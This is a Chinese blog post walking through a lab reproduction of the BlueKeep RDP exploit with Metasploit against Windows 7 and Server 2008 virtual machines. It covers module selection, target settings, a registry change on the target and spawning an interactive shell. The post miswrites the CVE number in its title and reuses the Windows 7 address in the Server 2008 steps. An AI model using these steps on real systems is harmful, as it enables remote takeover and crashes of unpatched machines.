回学校一周了,博客一直没时间更新,今天朋友圈被CVE-2019-07-08的 exp 炸了,也尝试着复现一下。

目前的exp只针对 win7 x64 以及 win server 2008 ,且2008需要修改注册表。

以下是复现过程。

攻击机:kali 192.168.31.137

靶机:

win7 企业版 192.168.31.128 vmware

server 2008 192.168.31.132 vmware

win7 x64的复现过程:

选择攻击模块use exploit/windows/cve_2019_0708_bluekeep_rce

查看设置信息 info

1

targets:攻击目标类型

1.物理卷

2.vritualbox 虚拟机

3.vmware 虚拟机

4.hyper -v 虚拟机

设置靶机ip set RHOSTS 192.168.31.128

设置靶机类型 set target 3

建立连接后使用 python 弹回交互式 shell。

2008 server的复现过程:

需要先修改注册表,不然就会直接打蓝屏。

win+r 输入 regedit

将注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0

设置靶机ip set RHOSTS 192.168.31.128

设置靶机类型 set target 3

建立连接后使用 python 弹回交互式 shell。

注:设置攻击类型时必须匹配靶机类型,不然就直接打蓝屏。

错误示范一下:

set target 设置为 1,效果如下:


参考链接:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961